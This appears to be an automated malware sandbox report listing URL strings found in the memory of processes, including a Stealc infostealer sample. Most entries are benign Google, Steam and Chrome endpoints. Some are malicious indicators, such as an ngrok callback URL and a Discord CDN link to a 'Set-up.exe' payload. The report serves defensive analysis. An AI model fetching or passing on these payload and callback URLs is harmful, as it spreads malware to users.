Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000000.2135901294.0000000000349000.00000002.00000001.01000000.00000010.sdmp, EcoCraft.scr, 00000029.00000002.3749890554.00000000006A9000.00000002.00000001.01000000.00000017.sdmp, EcoCraft.scr, 0000002F.00000002.2543717342.00000000006A9000.00000002.00000001.01000000.00000017.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.gstatic.com/generate_204
Source: stealc_default2.exe, stealc_default2.exe, 00000011.00000002.2209960916.000000006D1DD000.00000002.00000001.01000000.0000000E.sdmp String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: stealc_default2.exe, 00000011.00000002.2208381556.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, stealc_default2.exe, 00000011.00000002.2179244460.000000001B295000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: new_v8.exe, 00000016.00000003.2227702021.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2512478153.00000000058BD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 0000002B.00000002.2760023286.00002B3C0041C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2767632288.00002B3C009BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2769775665.00002B3C00AAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/LogoutB
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/MergeSessionRL
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 0000002B.00000002.2704260602.00002B3C00104000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 0000002B.00000002.2704260602.00002B3C00104000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 0000002B.00000002.2704260602.00002B3C00104000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 0000002B.00000002.2768656437.00002B3C00A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com:443
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/test
Source: Offnewhere.exe, 00000012.00000000.1986602049.000000000061B000.00000002.00000001.01000000.0000000A.sdmp String found in binary or memory: https://ace-snapper-privately.ngrok-free.app/test/testFailed
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 0000002B.00000003.2364448765.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2365195742.00002B3C00380000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://anglebug.com/7899
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&cta
Source: chrome.exe, 0000002B.00000002.2760490321.00002B3C004C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/px
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001396000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 0000000D.00000002.3755340826.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/1286706039475015741/1300800513197211749/Set-up.exe?ex=6722286
Source: axplong.exe, 0000000D.00000002.3755340826.0000000001359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.discordapp.com/k
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761492694.00002B3C00674000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760983245.00002B3C005E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 0000002B.00000002.2760983245.00002B3C005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 0000002B.00000002.2762405730.00002B3C00694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2768656437.00002B3C00A4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 0000002B.00000002.2760983245.00002B3C005E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreez84gdRw=
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstorekgejglhpjiefppelpmljglcjbhoiplfn
Source: chrome.exe, 0000002B.00000003.2260377369.00002298006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 0000002B.00000003.2260377369.00002298006B0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703524503.000022980078C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
Source: chrome.exe, 0000002B.00000003.2259650975.0000229800390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2259947837.000022980039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703786753.000022980080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromewebstore.google.com/
Source: chrome.exe, 0000002B.00000002.2771681065.00002B3C00C50000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://classroom.googleapis.com/_B
Source: chrome.exe, 0000002B.00000003.2240743054.000037A8002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2240774677.000037A8002E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/cr/report
Source: chrome.exe, 0000002B.00000002.2704121158.00002B3C000AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/c
Source: chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761091858.00002B3C0060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2307171567.00002B3C0046C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: chrome.exe, 0000002B.00000002.2771549895.00002B3C00C3C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx&
Source: chrome.exe, 0000002B.00000002.2704121158.00002B3C000AC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/cx
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clients4.google.com/chrome-sync/event
Source: chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761091858.00002B3C0060C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloW
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149512471.0000000000B4E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic&quot;HELP_BASE_URL&quot;:&quot;https:
